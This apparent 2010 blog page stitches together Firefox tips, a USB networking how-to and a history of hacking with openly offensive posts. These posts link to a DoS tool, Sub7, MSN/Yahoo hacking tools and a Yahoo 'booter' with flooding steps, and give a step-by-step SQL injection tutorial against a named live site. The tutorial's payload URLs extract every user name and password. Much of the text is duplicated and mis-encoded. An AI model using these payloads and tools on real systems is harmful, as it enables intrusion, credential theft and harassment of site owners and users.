Saturday, January 30, 2010
15-firefox-tricks
15 Coolest Firefox Tricks Ever
Everybody?fs favorite open-source browser, Firefox, is great right out of the box. And by adding some of the awesome extensions available out there, the browser just gets better and better.
But look under the hood, and there are a bunch of hidden (and some not-so-secret) tips and tricks available that will crank Firefox up and pimp your browser. Make it faster, cooler, more efficient. Get to be a Jedi master with the following cool Firefox tricks.
1) More screen space. Make your icons small. Go to View - Toolbars - Customize and check the ?gUse small icons?h box.
2) Smart keywords. If there?fs a search you use a lot (let?fs say IMDB.com?fs people search), this is an awesome tool that not many people use. Right-click on the search box, select ?gAdd a Keyword for this search?h, give the keyword a name and an easy-to-type and easy-to-remember shortcut name (let?fs say ?gactor?h) and save it. Now, when you want to do an actor search, go to Firefox?fs address bar, type ?gactor?h and the name of the actor and press return. Instant search! You can do this with any search box.
3) Keyboard shortcuts. This is where you become a real Jedi. It just takes a little while to learn these, but once you do, your browsing will be super fast. Here are some of the most common (and my personal favs):
* Spacebar (page down)
* Shift-Spacebar (page up)
* Ctrl+F (find)
* Alt-N (find next)
* Ctrl+D (bookmark page)
* Ctrl+T (new tab)
* Ctrl+K (go to search box)
* Ctrl+L (go to address bar)
* Ctrl+= (increase text size)
* Ctrl+- (decrease text size)
* Ctrl-W (close tab)
* F5 (reload)
* Alt-Home (go to home page)
4) Auto-complete. This is another keyboard shortcut, but it?fs not commonly known and very useful. Go to the address bar (Control-L) and type the name of the site without the ?gwww?h or the ?g.com?h. Let?fs say ?ggoogle?h. Then press Control-Enter, and it will automatically fill in the ?gwww?h and the ?g.com?h and take you there - like magic! For .net addresses, press Shift-Enter, and for .org addresses, press Control-Shift-Enter.
5) Tab navigation. Instead of using the mouse to select different tabs that you have open, use the keyboard. Here are the shortcuts:
* Ctrl+Tab (rotate forward among tabs)
* Ctrl+Shft+Tab (rotate to the previous tab)
* Ctrl+1-9 (choose a number to jump to a specific tab)
6) Mouse shortcuts. Sometimes you?fre already using your mouse and it?fs easier to use a mouse shortcut than to go back to the keyboard. Master these cool ones:
* Middle click on link (opens in new tab)
* Shift-scroll down (previous page)
* Shift-scroll up (next page)
* Ctrl-scroll up (decrease text size)
* Ctrl-scroll down (increase text size)
* Middle click on a tab (closes tab)
7) Delete items from address bar history. Firefox?fs ability to automatically show previous URLs you?fve visited, as you type, in the address bar?fs drop-down history menu is very cool. But sometimes you just don?ft want those URLs to show up (I won?ft ask why). Go to the address bar (Ctrl-L), start typing an address, and the drop-down menu will appear with the URLs of pages you?fve visited with those letters in them. Use the down-arrow to go down to an address you want to delete, and press the Delete key to make it disappear.
8) User chrome. If you really want to trick out your Firefox, you?fll want to create a UserChrome.css file and customize your browser. It?fs a bit complicated to get into here, but check out this tutorial.
9) Create a user.js file. Another way to customize Firefox, creating a user.js file can really speed up your browsing. You?fll need to create a text file named user.js in your profile folder (see this to find out where the profile folder is) and see this example user.js file that you can modify. Created by techlifeweb.com, this example explains some of the things you can do in its comments.
10) about:config. The true power user?fs tool, about.config isn?ft something to mess with if you don?ft know what a setting does. You can get to the main configuration screen by putting about:config in the browser?fs address bar. See Mozillazine?fs about:config tips and screenshots.
11) Add a keyword for a bookmark. Go to your bookmarks much faster by giving them keywords. Right-click the bookmark and then select Properties. Put a short keyword in the keyword field, save it, and now you can type that keyword in the address bar and it will go to that bookmark.
12) Speed up Firefox. If you have a broadband connection (and most of us do), you can use pipelining to speed up your page loads. This allows Firefox to load multiple things on a page at once, instead of one at a time (by default, it?fs optimized for dialup connections). Here?fs how:
* Type ?gabout:config?h into the address bar and hit return. Type ?gnetwork.http?h in the filter field, and change the following settings (double-click on them to change them):
* Set ?gnetwork.http.pipelining?h to ?gtrue?h
* Set ?gnetwork.http.proxy.pipelining?h to ?gtrue?h
* Set ?gnetwork.http.pipelining.maxrequests?h to a number like 30. This will allow it to make 30 requests at once.
* Also, right-click anywhere and select New-> Integer. Name it ?gnglayout.initialpaint.delay?h and set its value to ?g0??. This value is the amount of time the browser waits before it acts on information it receives.
13) Limit RAM usage. If Firefox takes up too much memory on your computer, you can limit the amount of RAM it is allowed to us. Again, go to about:config, filter ?gbrowser.cache?h and select ?gbrowser.cache.disk.capacity?h. It?fs set to 50000, but you can lower it, depending on how much memory you have. Try 15000 if you have between 512MB and 1GB ram.
14) Reduce RAM usage further for when Firefox is minimized. This setting will move Firefox to your hard drive when you minimize it, taking up much less memory. And there is no noticeable difference in speed when you restore Firefox, so it?fs definitely worth a go. Again, go to about:config, right-click anywhere and select New-> Boolean. Name it ?gconfig.trim_on_minimize?h and set it to TRUE. You have to restart Firefox for these settings to take effect.
15) Move or remove the close tab button. Do you accidentally click on the close button of Firefox?fs tabs? You can move them or remove them, again through about:config. Edit the preference for ?gbrowser.tabs.closeButtons?h. Here are the meanings of each value:
* 0: Display a close button on the active tab only * 1Default) Display close buttons on all tabs * 2on?ft display any close buttons * 3isplay a single close button at the end of the tab bar
Connecting-two-computers-using-usb
Hi...Friends.........
USB, also known as Universal Serial Bus, is one of the most useful computer-related technologies ever developed.
USB is used to connect printers, keyboards, digital cameras and even MP3 players to your computer.
But you can also connect two computers using USB...Want to know how.. Then Here it is.....
Step 1>Turn on both of the computers. Log in to Windows using an account with administrator privileges.
Step 2>Insert one end of the USB bridge cable into a USB slot on one computer, and the other end of the bridge into the second computer.
Step 3>Install the driver software for the USB bridge cable when the computers prompt you to do so. If you do not have driver software for the USB bridge cable, you may be able to download it from the cable manufacturer.
Step 4>Choose to install the USB bridge cable either as a link adapter or a network adapter. If you install it as a link adapter, you will only be able to transfer files back and forth. If you install it as a network adapter, you will have full network functionality.
Step 5>Complete the software installation. Your two computers should now be connected.
USB, also known as Universal Serial Bus, is one of the most useful computer-related technologies ever developed.
USB is used to connect printers, keyboards, digital cameras and even MP3 players to your computer.
But you can also connect two computers using USB...Want to know how.. Then Here it is.....
Step 1>Turn on both of the computers. Log in to Windows using an account with administrator privileges.
Step 2>Insert one end of the USB bridge cable into a USB slot on one computer, and the other end of the bridge into the second computer.
Step 3>Install the driver software for the USB bridge cable when the computers prompt you to do so. If you do not have driver software for the USB bridge cable, you may be able to download it from the cable manufacturer.
Step 4>Choose to install the USB bridge cable either as a link adapter or a network adapter. If you install it as a link adapter, you will only be able to transfer files back and forth. If you install it as a network adapter, you will have full network functionality.
Step 5>Complete the software installation. Your two computers should now be connected.
Dos Http Hack
http dos tool while i cleaned up my computer today.
So since i havn't sherd anything on pakwarez yet i thought this could be my first one.
The serial is in the readme file with the user guide.
I've tested on free small websites and i got one of them down. (My freind kept wathing if the site was down used 15 min on all 3)
Download link 1; http://rapidshare.com/files/172640065/DOSHTTP.zip
Download link 2: http://rapidshare.com/files/172639966/DOSHTTP.zip
Download link 3: http://www.megaupload.com/?d=8B8H9HKO
And Enj0y
Hacking Toolz!!
Hack Tools
http://rapidshare.com/files/53227068/Htool.part1.rar
http://rapidshare.com/files/53230471/Htool.part2.rar
Rapidshare hackers
http://rapidshare.com/files/43093441/rhack2007_by_mechodownload.rar
pass: mechodownload
MSN HACK
http://rapidshare.com/files/38797836/Msn.AIO.Hack_Warez-Power.com.rar
Sub7 For Experts
!!Download Ultimate Hcking Tool "Sub7 legends"!!!!
Not for beginners!!!!! use carefully!!! Tutorial provided inside zip
password: 123456
click to get
http://www.filefactory.com/file/8207bf
Yahoo Booter!!
YAHOO BOOTER
http://rapidshare.com/files/55825962/Colt1BotYaHell.zip.htm
1) Double click the .exe file. Labeled "Colts 1Bot YaHell.exe". A window containing the main forum labeled "Colts 1Bot YaHell" should pop up.
2) Now we need to enter the bot name in the label titled "Y! Name" and the password into the label titled "Y! Pass"
3) Pretty much self explanitory...hit the "login button"
4) Now you type your nameyou want to boot into the label titled "Lamer" and choose one of your three booting options. Which include PM Bomb, Imv Bomb, and Buzz Bomb
Yahoo Magic Pass
use this one really easy
mAgic Password |Sender
http://rapidshare.com/files/56051314/mps7.zip.html
http://rapidshare.com/files/53227068/Htool.part1.rar
http://rapidshare.com/files/53230471/Htool.part2.rar
Rapidshare hackers
http://rapidshare.com/files/43093441/rhack2007_by_mechodownload.rar
pass: mechodownload
MSN HACK
http://rapidshare.com/files/38797836/Msn.AIO.Hack_Warez-Power.com.rar
Sub7 For Experts
!!Download Ultimate Hcking Tool "Sub7 legends"!!!!
Not for beginners!!!!! use carefully!!! Tutorial provided inside zip
password: 123456
click to get
http://www.filefactory.com/file/8207bf
Yahoo Booter!!
YAHOO BOOTER
http://rapidshare.com/files/55825962/Colt1BotYaHell.zip.htm
1) Double click the .exe file. Labeled "Colts 1Bot YaHell.exe". A window containing the main forum labeled "Colts 1Bot YaHell" should pop up.
2) Now we need to enter the bot name in the label titled "Y! Name" and the password into the label titled "Y! Pass"
3) Pretty much self explanitory...hit the "login button"
4) Now you type your nameyou want to boot into the label titled "Lamer" and choose one of your three booting options. Which include PM Bomb, Imv Bomb, and Buzz Bomb
Yahoo Magic Pass
use this one really easy
mAgic Password |Sender
http://rapidshare.com/files/56051314/mps7.zip.html
A history of hacking
Hacking has been around for more than a century. In the 1870s, several teenagers were flung off the country's brand new phone system by enraged authorities. Here's a peek at how busy hackers have been in the past 35 years.
Early 1960s
University facilities with huge mainframe computers, like MIT's artificial intelligence lab, become staging grounds for hackers. At first, "hacker" was a positive term for a person with a mastery of computers who could push programs beyond what they were designed to do.
Early 1970s
John Drap*r makes a long-distance call for free by blowing a precise tone into a telephone that tells the phone system to open a line. Drap*r discovered the whistle as a give-away in a box of children's cereal. Drap*r, who later earns the handle "Captain Crunch," is arrested repeatedly for phone tampering throughout the1970s.
Yippie social movement starts YIPL/TAP (Youth International Party Line/Technical Assistance Program) magazine to help phone hackers (called "phreaks") make free long-distance calls.
Two members of California's Homebrew Computer Club begin making "blue boxes," devices used to hack into the phone system. The members, who adopt handles "Berkeley Blue" (Steve Jobs) and "Oak Toebark" (Steve Wozniak), later go on to found Apple Computer.
Early 1980s
Author William Gibson coins the term "cyberspace" in a science fiction novel called Neuromancer.
In one of the first arrests of hackers, the FBI busts the Milwaukee-based 414s (named after the local area code) after members are accused of 60 computer break-ins ranging from Memorial Sloan-Kettering Cancer Center to Los Alamos National Laboratory.
Comprehensive Crime Control Act gives Secret Service jurisdiction over credit card and computer fraud.
Two hacker groups form, the Legion of Doom in the United States and the Chaos Computer Club in Germany.
2600: The Hacker Quarterly is founded to share tips on phone and computer hacking.
Late 1980s
The Computer Fraud and Abuse Act gives more clout to federal authorities.
Computer Emergency Response Team is formed by U.S. defense agencies. Based at Carnegie Mellon University in Pittsburgh, its mission is to investigate the growing volume of attacks on computer networks.
At 25, veteran hacker Kevin Mitnick secretly monitors the e-mail of MCI and Digital Equipment security officials. He is convicted of damaging computers and stealing software and is sentenced to one year in prison.
First National Bank of Chicago is the victim of a $70-million computer heist.
An Indiana hacker known as "Fry Guy" -- so named for hacking McDonald's -- is raided by law enforcement. A similar sweep occurs in Atlanta for Legion of Doom hackers known by the handles "Prophet," "Leftist" and "Urvile."
Early 1990s
After AT&T long-distance service crashes on Martin Luther King Jr. Day, law enforcement starts a national crackdown on hackers. The feds nab St. Louis' "Knight Lightning" and in New York grab Masters of Deception trio "Phiber Optik," " Acid Phreak" and "Scorpion." Fellow hacker "Eric Bloodaxe" is picked up in Austin, Texas.
Operation Sundevil, a special team of Secret Service agents and members of Arizona's organized crime unit, conducts raids in 12 major cities, including Miami.
A 17-month search ends in the capture of hacker Kevin Lee Poulsen ("Dark Dante"), who is indicted for stealing military documents.
Hackers break into Griffith Air Force Base, then pewwwte computers at NASA and the Korean Atomic Research Institute. Scotland Yard nabs "Data Stream," a 16-year-old British teenager who curls up in the fetal position when seized.
A Texas A&M professor receives death threats after a hacker logs on to his computer from off-campus and sends 20,000 racist e-mail messages using his Internet address.
In a highly publicized case, Kevin Mitnick is arrested (again), this time in Raleigh, N.C., after he is tracked down via computer by Tsutomu Shimomura at the San Diego Supercomputer Center.
Late 1990s
Hackers break into and deface federal Web sites, including the U.S. Department of Justice, U.S. Air Force, CIA, NASA and others.
Report by the General Accounting Office finds Defense Department computers sustained 250,000 attacks by hackers in 1995 alone.
A Canadian hacker group called the Brotherhood, angry at hackers being falsely accused of electronically stalking a Canadian family, break into the Canadian Broadcasting Corp. Web site and leave message: "The media are liars." Family's own 15-year-old son eventually is identified as stalking culprit.
Hackers pierce security in Microsoft's NT operating system to illustrate its weaknesses.
Popular Internet search engine Yahoo! is hit by hackers claiming a "logic bomb" will go off in the PCs of Yahoo!'s users on Christmas Day 1997 unless Kevin Mitnick is released from prison. "There is no virus," Yahoo! spokeswoman Diane Hunt said.
1998
Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway.
In January, the federal Bureau of Labor Statistics is inundated for days with hundreds of thousands of fake information requests, a hacker attack called "spamming."
Hackers break into United Nation's Children Fund Web site, threatening a "holocaust" if Kevin Mitnick is not freed.
Hackers claim to have broken into a Pentagon network and stolen software for a military satellite system. They threaten to sell the software to terrorists.
The U.S. Justice Department unveils National Infrastructure Protection Center, which is given a mission to protect the nation's telecommunications, technology and transportation systems from hackers.
Hacker group L0pht, in testimony before Congress, warns it could shut down nationwide access to the Internet in less than 30 minutes. The group urges stronger security measures.
Early 1960s
University facilities with huge mainframe computers, like MIT's artificial intelligence lab, become staging grounds for hackers. At first, "hacker" was a positive term for a person with a mastery of computers who could push programs beyond what they were designed to do.
Early 1970s
John Drap*r makes a long-distance call for free by blowing a precise tone into a telephone that tells the phone system to open a line. Drap*r discovered the whistle as a give-away in a box of children's cereal. Drap*r, who later earns the handle "Captain Crunch," is arrested repeatedly for phone tampering throughout the1970s.
Yippie social movement starts YIPL/TAP (Youth International Party Line/Technical Assistance Program) magazine to help phone hackers (called "phreaks") make free long-distance calls.
Two members of California's Homebrew Computer Club begin making "blue boxes," devices used to hack into the phone system. The members, who adopt handles "Berkeley Blue" (Steve Jobs) and "Oak Toebark" (Steve Wozniak), later go on to found Apple Computer.
Early 1980s
Author William Gibson coins the term "cyberspace" in a science fiction novel called Neuromancer.
In one of the first arrests of hackers, the FBI busts the Milwaukee-based 414s (named after the local area code) after members are accused of 60 computer break-ins ranging from Memorial Sloan-Kettering Cancer Center to Los Alamos National Laboratory.
Comprehensive Crime Control Act gives Secret Service jurisdiction over credit card and computer fraud.
Two hacker groups form, the Legion of Doom in the United States and the Chaos Computer Club in Germany.
2600: The Hacker Quarterly is founded to share tips on phone and computer hacking.
Late 1980s
The Computer Fraud and Abuse Act gives more clout to federal authorities.
Computer Emergency Response Team is formed by U.S. defense agencies. Based at Carnegie Mellon University in Pittsburgh, its mission is to investigate the growing volume of attacks on computer networks.
At 25, veteran hacker Kevin Mitnick secretly monitors the e-mail of MCI and Digital Equipment security officials. He is convicted of damaging computers and stealing software and is sentenced to one year in prison.
First National Bank of Chicago is the victim of a $70-million computer heist.
An Indiana hacker known as "Fry Guy" -- so named for hacking McDonald's -- is raided by law enforcement. A similar sweep occurs in Atlanta for Legion of Doom hackers known by the handles "Prophet," "Leftist" and "Urvile."
Early 1990s
After AT&T long-distance service crashes on Martin Luther King Jr. Day, law enforcement starts a national crackdown on hackers. The feds nab St. Louis' "Knight Lightning" and in New York grab Masters of Deception trio "Phiber Optik," " Acid Phreak" and "Scorpion." Fellow hacker "Eric Bloodaxe" is picked up in Austin, Texas.
Operation Sundevil, a special team of Secret Service agents and members of Arizona's organized crime unit, conducts raids in 12 major cities, including Miami.
A 17-month search ends in the capture of hacker Kevin Lee Poulsen ("Dark Dante"), who is indicted for stealing military documents.
Hackers break into Griffith Air Force Base, then pewwwte computers at NASA and the Korean Atomic Research Institute. Scotland Yard nabs "Data Stream," a 16-year-old British teenager who curls up in the fetal position when seized.
A Texas A&M professor receives death threats after a hacker logs on to his computer from off-campus and sends 20,000 racist e-mail messages using his Internet address.
In a highly publicized case, Kevin Mitnick is arrested (again), this time in Raleigh, N.C., after he is tracked down via computer by Tsutomu Shimomura at the San Diego Supercomputer Center.
Late 1990s
Hackers break into and deface federal Web sites, including the U.S. Department of Justice, U.S. Air Force, CIA, NASA and others.
Report by the General Accounting Office finds Defense Department computers sustained 250,000 attacks by hackers in 1995 alone.
A Canadian hacker group called the Brotherhood, angry at hackers being falsely accused of electronically stalking a Canadian family, break into the Canadian Broadcasting Corp. Web site and leave message: "The media are liars." Family's own 15-year-old son eventually is identified as stalking culprit.
Hackers pierce security in Microsoft's NT operating system to illustrate its weaknesses.
Popular Internet search engine Yahoo! is hit by hackers claiming a "logic bomb" will go off in the PCs of Yahoo!'s users on Christmas Day 1997 unless Kevin Mitnick is released from prison. "There is no virus," Yahoo! spokeswoman Diane Hunt said.
1998
Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway.
In January, the federal Bureau of Labor Statistics is inundated for days with hundreds of thousands of fake information requests, a hacker attack called "spamming."
Hackers break into United Nation's Children Fund Web site, threatening a "holocaust" if Kevin Mitnick is not freed.
Hackers claim to have broken into a Pentagon network and stolen software for a military satellite system. They threaten to sell the software to terrorists.
The U.S. Justice Department unveils National Infrastructure Protection Center, which is given a mission to protect the nation's telecommunications, technology and transportation systems from hackers.
Hacker group L0pht, in testimony before Congress, warns it could shut down nationwide access to the Internet in less than 30 minutes. The group urges stronger security measures.
How Hack A web site
WRITTEN BY A ---NITIN----
for my purposes, i will use www.buysellusa.net as an example, this site is hackable.
if you try on this site, and it does NOT work, that means either i spelt the url wrong (silly me) or that the site has been fixed
Dont be to harsh on me for making it so nooby, i didnt get any of the articles explaining sql injections when i was first learning if you get lost, keep reading, it might explain what you do not understand ahead.
Well, yeah, self explanitory. OK, here, in this article, i will teach you how to hack a website.
The method we are going to use is called mysql injection. Sql mean, "structured query language".
What this means, is that this programming language lets you send queries (a request for information and such) to a database and access hidden, or "confidential files" such as passwords, and usernames, if you catch my drift. A database is an orginized body of related data, or in simpler terms, like all the vital info stored on the website, and vital coding, or "scripting"(the programming) i think (im not very smart). Well, when making a mysql injection, you have to determine (find out) wether or not a site is vulnerable first (vulnerable, as in, you can make a proper mysql injection, or more simplified, if the web site can be hacked). To find out wether or not a site is vulnerable, you need to change the url. Simple isnt it. But, to get proper results, you need to find a url, that contains a VARIABLE
<--------this is VERY important) An example of a url that contains a variable, is
http://buysellusa.net/classifieds/showCat.php?cat_id=10
The variable in this Url (website adress) is "cat_id=10"
A variable is a snipet of code or information that is assigned a value. like for example
tom=1
now, lets say this;
1+tom=2
do you understand?
it is a value pretty much. The value of this variable "cat_id=10" is 10.
Now, to determine wether or not you CAN hack this site. What you need to do, is make a change to the url, like i said before
now, this url, "http://buysellusa.net/classifieds/showCat.php?cat_id=10" must have something ADDED to it. At the end of the url,
add ' thats right, just add '
so the new url is:
http://buysellusa.net/classifieds/showCat.php?cat_id=10'
now if the site you want to hack is vulnerable, you should get and error message on the page. there are other ways to determine wether or not a site is vulnerable to mysql injections, dont get me wrong, but for my purposes, this is the way i will show you.
Now, on this particular url, when you add the magical character ' you should get an error message, something simaler to this:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 57
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_tree.php on line 424
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 85
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND std_items.cat_id=std_categories.cat_id LIMIT
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_getResults.php on line 143
now remember, this is very vauge. It can be almost anything, as long as it mentions MySQL. If it mentions some random crap about vb its not vulnerable (AS FAR AS I KNOW)
now when you get that error your in buisness. This means your target site, or the site im using as an example, is vulnerable! HURRAY! now you can get to the hacking
ok next you need to find the number of columns. This i dont fully understand myself, like i said, i am an uber noob.
I THINK what the columns are, are the columns of data inside a chart. Like a chart stored within the database, that can hold like, usernames , or passwords. Anyhow you need to find out how many there are (how many columns for what chart? wtf im confused too, you just have to do it)
ok; to find the amount of charts, you have to use the statement in SQL which is" order by" , this tells the database how to order the results (im still confused, your not alone)
now, in the url, delete you magical character ' i know, it dosent deserve it, but do you want to hack or not? ok now the url is once again
http://buysellusa.net/classifieds/showCat.php?cat_id=10
Now, add the "Order by" command to the end
so the url should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by
now to find out the number of coloums, you would add a one to "Order by" so it would become "Order by 1"
now, the url is :
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1
but thats not all. You need to add some characters at the end, which tell the database that it is a query, and not you trying to connect to another page of the site. To do this, you use one of the following" -- " or " /* " these denote that the text is a comment. These are used in programming when you need to write yourself something to remember inside your code, or script.
it dosent matter what it is for, if you dont understand, you just need to know when to use it.
so add either -- or /* to the end of your url
(there are two different methods, because some servers block one of the methods, so if one of the comment symbols* -- * or * /* * dont work, try the other one. i personally prefer -- its faster the url is now:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1-- OR http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
make sure not to leave a space between your 1 and your -- or /* now the first time, it is not going to work obviously. To find out the number of columns, you need to increase the number "1" by 1 every time you try
so the first time you would make the url:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
second time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 2/*
third time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 3/*
and so on and so on, untill you encounter ANOTHER error. It should say something about mysql. now you know the number of coloums. Lets say it took you 5 tires, on the fifth try, there was an error, then you have 4 columns, because the 5th try is an error, that means the column does not exist in this table (a table located inside the database) now, you have the amount of columns, which is great.
Now we have to use the UNION function, which allows you to select more data within one sql statment. The statment in this case being what you add to the end of the url(hope your not lost) Now when we use the union function, the syntax (how we use it, where we use it) is like so:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select
but we want it to look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2/*
what this does is select the columns in the table, column 1,2,3 and column 4
now of course, you only want to select the number of columns that you have determined exist. In my example, i determined 4. Therefore, i selected column 1,2,3 and 4.
to tell if this command is working, look for numbers on the webpage, that werent there before. The numbers could be 1 or any number up to the amount of columns you found. So if there were 8 columns, the new number could be anywhere from 1-8.
Now you need to check for the mysql version. This is important, because if it is version 5, you job will be ALOT esier
now this part is sometimes tricky. Look to find the new number that appeared. Now, in your url
which should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union select all 1,2/*
you need to replace the number in the url that matches the number that appeared on the web page (so if the number that appeared is 2, then you replace the 2 in "union select all 1,2/*"
what you replace it with is:
@@version or version() if @@version yeilded no results
. we should get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,@@version/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." what we need is convert() function
i.e. http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,convert(@@version using latin1)/*
(yeah, im confused too, dont worry, you might not have to use this) or with hex() and unhex()
i.e. http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,unhex(hex(@@version))/*
and you will get the MySQL version The numbers telling you the version will appear on the web page, most lilkey where the other number appeared.
Now, one of the hardest parts, you need to find out the name of the table in which you wish to see the information of. Be it the table that stores passwords, or usernames, or both. you need to find out. This part can come down to guessing. But remember, always make an educated guess. Dont guess something random like spongepurple guess something like password or pswrd or user_name or user_names, you catch my drift? so in order to guess the name, use a syntax like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from randomguess/*
on this site, i know for a fact, that the user name table is
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from std_users/*
std means standard
now, you should get MORE numbers. But what do you do with them? you need to extract (put the data into a readable format) the data. To do this, you need the column name. On this site, and on lots more sites, you can get a rough idea of what the column name is by reading the source of the webpage. The source, is the coding. you can read this by right clicking on the page and hit "Veiw Source Code". Now you need to find the register coding to do this you might have to open up a new internet clien (have to internets running at once) or on firefox, another tab. On your second internet, go to the "Creat account" page and veiw the source on This website, www.buysellusa.com the code is as follows:
Password:
here we can clearly see the words "new_user_name" and "password1" from "new_user_name" im going to keep "User_name" because that seems logical
now to see if im right, i will need to check
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
notice where i put "user_name" i put it inbetween the two columns, column 1 and column 2. Then i made sure to state WHERE i am selecting this data (from the column named "user_name") from, the std_users table. and VIOLA! you have every single account user name registered on the site. But now, we need the password.
now before, when we looked at the source code, we saw two interesting things, "New_user_name" and "password1" now we need the "password1"
i will get rid of the one, because why would the column name have a 1 in it? so basicially, you do the same thing that you did with the user names.
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
but instead of that, its:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,password,2 from std_users/*
and ONCE AGAIN! VIOLA! you now have the password to each and every account on the site.
but the lesson is not over, now, to make it easier, we will reformat your results, so they can be better read.
to do this, simply use the contact function.
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,concat(user_name,0x3a,password),2 from std_users/*
what this does, in a sense, is contact thoes columns from the chart you specify (in this case std_users) and displays there information, but, now, you can display them both at the same time, because they are being simotaneously contacted. And, in this context, it syncronizez the username to its password like so:
usernameassword
he 0x3a is just a hex code, it is equal to a colon, so your results will look nice.
and thats all.
If you have done this right, you should have just hacked a site.
for your first time, try on www.buysellusa.net its easy :P on www.buysellusa.net, make sure to use /* comment symbol!
please comment on anything i explained wrong, or didnt explain enough... after all, i am new at this Thanks to S0vv and p3ri0d for their help
for my purposes, i will use www.buysellusa.net as an example, this site is hackable.
if you try on this site, and it does NOT work, that means either i spelt the url wrong (silly me) or that the site has been fixed
Dont be to harsh on me for making it so nooby, i didnt get any of the articles explaining sql injections when i was first learning if you get lost, keep reading, it might explain what you do not understand ahead.
Well, yeah, self explanitory. OK, here, in this article, i will teach you how to hack a website.
The method we are going to use is called mysql injection. Sql mean, "structured query language".
What this means, is that this programming language lets you send queries (a request for information and such) to a database and access hidden, or "confidential files" such as passwords, and usernames, if you catch my drift. A database is an orginized body of related data, or in simpler terms, like all the vital info stored on the website, and vital coding, or "scripting"(the programming) i think (im not very smart). Well, when making a mysql injection, you have to determine (find out) wether or not a site is vulnerable first (vulnerable, as in, you can make a proper mysql injection, or more simplified, if the web site can be hacked). To find out wether or not a site is vulnerable, you need to change the url. Simple isnt it. But, to get proper results, you need to find a url, that contains a VARIABLE
<--------this is VERY important) An example of a url that contains a variable, is
http://buysellusa.net/classifieds/showCat.php?cat_id=10
The variable in this Url (website adress) is "cat_id=10"
A variable is a snipet of code or information that is assigned a value. like for example
tom=1
now, lets say this;
1+tom=2
do you understand?
it is a value pretty much. The value of this variable "cat_id=10" is 10.
Now, to determine wether or not you CAN hack this site. What you need to do, is make a change to the url, like i said before
now, this url, "http://buysellusa.net/classifieds/showCat.php?cat_id=10" must have something ADDED to it. At the end of the url,
add ' thats right, just add '
so the new url is:
http://buysellusa.net/classifieds/showCat.php?cat_id=10'
now if the site you want to hack is vulnerable, you should get and error message on the page. there are other ways to determine wether or not a site is vulnerable to mysql injections, dont get me wrong, but for my purposes, this is the way i will show you.
Now, on this particular url, when you add the magical character ' you should get an error message, something simaler to this:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 57
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_tree.php on line 424
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 85
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND std_items.cat_id=std_categories.cat_id LIMIT
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_getResults.php on line 143
now remember, this is very vauge. It can be almost anything, as long as it mentions MySQL. If it mentions some random crap about vb its not vulnerable (AS FAR AS I KNOW)
now when you get that error your in buisness. This means your target site, or the site im using as an example, is vulnerable! HURRAY! now you can get to the hacking
ok next you need to find the number of columns. This i dont fully understand myself, like i said, i am an uber noob.
I THINK what the columns are, are the columns of data inside a chart. Like a chart stored within the database, that can hold like, usernames , or passwords. Anyhow you need to find out how many there are (how many columns for what chart? wtf im confused too, you just have to do it)
ok; to find the amount of charts, you have to use the statement in SQL which is" order by" , this tells the database how to order the results (im still confused, your not alone)
now, in the url, delete you magical character ' i know, it dosent deserve it, but do you want to hack or not? ok now the url is once again
http://buysellusa.net/classifieds/showCat.php?cat_id=10
Now, add the "Order by" command to the end
so the url should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by
now to find out the number of coloums, you would add a one to "Order by" so it would become "Order by 1"
now, the url is :
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1
